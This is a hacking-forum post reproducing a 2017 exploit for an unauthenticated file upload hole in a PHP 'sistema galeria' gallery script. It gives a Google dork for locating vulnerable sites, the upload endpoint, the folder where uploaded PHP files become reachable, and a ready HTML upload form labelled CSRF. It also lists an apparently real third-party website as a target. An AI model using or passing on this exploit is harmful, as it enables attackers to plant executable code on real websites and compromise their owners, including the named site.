Joined
Jan 19, 2017
Credits
0
Rating - 0%
PHP:
#################################################################################
# sistema galeria File Upload Vulnerability | CSRF
# Author : sohaip-hackerDZ
# Google Dork: inurl:/sistema/galeria/server/
# Tested on: , Linux
# data : 2017-05-05
# Blog : http://www.tools-hack.com/
#################################################################################



# [!] Exploit : http://127.0.0.1/path/sistema/galeria/server/php/index.php
# [!] File Location : http:/127.0.0.1/path/sistema/galeria/server/php/galeria/medium/FILE_NAME.php
#################################################################################
#CSRF:
#################################################################################
<html>
<body>
<form enctype="multipart/form-data" action="127.0.0.1/sistema/galeria/server/php/index.php" method="post">
Your File: <input name="files[]" type="file" /><br />
<input type="submit" value="SIKAT!" />
</form>
</body>
</html>
#################################################################################
# http://maximacoifasvale.com.br/sistema/galeria/server/php/index.php
#################################################################################
# ABOUT:
# Facebook: https://www.facebook.com/sohaipbarika
# forum: http://spyhackerz.com/forum/
#
#################################################################################

References:
http://www.tools-hack.com/2017/05/ex.html
https://cxsecurity.com/issue/WLB-2017050041
 

Users who are viewing this thread

Top